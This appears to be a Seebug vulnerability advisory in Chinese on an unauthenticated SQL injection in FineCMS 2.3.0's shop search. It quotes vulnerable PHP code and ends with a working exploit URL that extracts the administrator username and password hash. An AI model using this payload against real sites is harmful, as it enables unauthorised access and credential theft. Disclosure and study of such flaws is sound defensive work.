FineCMS最新版SQL注入

2014-05-11T00:00:00
ID SSV:94811
Type seebug
Reporter Root
Modified 2014-05-11T00:00:00

Description

简要描述:

finecms最新版2.3.0(2014年4月18号更新)SQL注入

详细说明:

finecms最新版2.3.0,官方2014年4月18号更新。 某处存在SQL注入,无需登陆,可直接注入获取管理员账号。 文件:FineCMS v2.3.0/shop/controllers/search.php

/** * 搜索 */ public function index() { parent::_search(); }

进入search,文件/FineCMS v2.3.0/dayrui/core/D_Module.php:

``` /* * 模块内容搜索页 / protected function _search() {

            $this->load->model('search_model');
            $mod = $this->get_cache

('module-'.SITE_ID.'-'.APP_DIR); // 清除过期缓存 $this->search_model->clear($mod ['setting']['search']['cache']); // 搜索参数 $get = $this->input->get(NULL, TRUE); $get = isset($get['rewrite']) ? dr_rewrite_decode($get['rewrite']) : $get; $id = $get['id']; $catid = (int)$get['catid']; $get['keyword'] = str_replace(array ('%', ' '), array('', '%'), $get['keyword']); unset($get['c'], $get['m'], $get ['id'], $get['page']); // 关键字个数判断 if ($get['keyword'] && strlen($get ['keyword']) < (int)$mod['setting']['search'] ['length']) { $this->msg(lang('mod-31')); } if ($id) { // 读缓存数据 $data = $this->search_model- >get($id); $catid = $data['catid']; $data['get'] = $data ['params']; if (!$data) { $this->msg(lang('mod-32')); } } else { // 组合搜索条件 $data = $this->search_model- >set($get); } list($parent, $related) = $this- >_related_cat($mod, $catid); $urlrule = $mod['setting']['search'] ['rewrite'] ? 'search-id-{id}-page-{page}.html' : 'index.php?c=search&id={id}&page={page}'; $this->template->assign (dr_category_seo($mod, $mod['category'][$catid], max (1, (int)$this->input->get('page')))); $this->template->assign(array( 'get' => $get, 'cat' => $mod['category'] [$catid], 'caitd' => $catid, 'parent' => $parent, 'related' => $related, 'keyword' => $get['keyword'], 'urlrule' => str_replace ('{id}', $data['id'], $urlrule), )); $this->template->assign($data); $this->template->display ('search.html'); }

    /**
 * 顶级可用栏目
 */
public function show_select_category() {

            $data = array();
            $category = $this-&gt;get_cache

('module-'.SITE_ID.'-'.APP_DIR, 'category');

    foreach ($category as $t) {
                    if (!$t['child'] && $t

['permission'][$this->member['mark']]['add']) { $pids = explode(',', $t['pids']); $pid = (int)$pids[1]; if (isset($category [$pid])) { $category [$pid]['mark'] = 1; $data[$pid] = $category[$pid]; } } }

            $this-&gt;template-&gt;assign(array(
                    'id' =&gt; 2,
                    'list' =&gt; $data
            ));
            $this-&gt;template-&gt;display

('category_select.html'); } ```

在组合搜索条件时处理了get参数。 文件,/FineCMS v2.3.0/dayrui/models/Search_model.php:

``` public function set($get) {

            // 查询表名称
            $table = $this-&gt;db-&gt;dbprefix

(SITE_ID.''.APP_DIR); $table_more = $this->db->dbprefix (SITE_ID.''.APP_DIR.'_category_data'); ......... // 栏目的字段 if ($get['catid']) { $more = FALSE; $cat_field = $module ['category'][$get['catid']]['field']; $where[0] = ''. $table.'.catid'.($module['category'][$get ['catid']]['child'] ? 'IN ('.$module['category'][$get ['catid']]['childids'].')' : '='.$get['catid']); if ($cat_field) { foreach ($cat_field as $name => $field) { if (isset ($get[$name]) && $get[$name]) { $more = TRUE;

$where[] = $this->_where($table_more, $name, $get [$name], $cat_field); } if (isset ($_order_by[$name])) { $more = TRUE;

$order_by[] = ''.$table.'.'.$name.' '.$_order_by [$name]; } } } if ($more) $from.= ' LEFT JOIN '.$table_more.' ON '.$table.'.id='. $table_more.'.id'; } ......... ```

在处理栏目字段时:

$where[0] = '`'.$table.'`.`catid`'.($module ['category'][$get['catid']]['child'] ? 'IN ('.$module ['category'][$get['catid']]['childids'].')' : '='. $get['catid']);

对参数carid没有加引号保护,导致SQL注入。

漏洞证明:

EXP:

http://localhost/shop/index.php?c=search&catid=23%20and%201=2%20AND%20(SELECT%203002%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20CONCAT(USERNAME,0x23,PASSWORD)%20FROM%20FINECMS_MEMBER%20LIMIT%200,1),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&price=1000,2000

如图,获取管理员帐号信息:

<img src="https://images.seebug.org/upload/201405/10155712b85ae0fb2cfd42e1481837fa12483583.jpg" alt="finecms1.jpg" width="600" onerror="javascript:errimg(this);">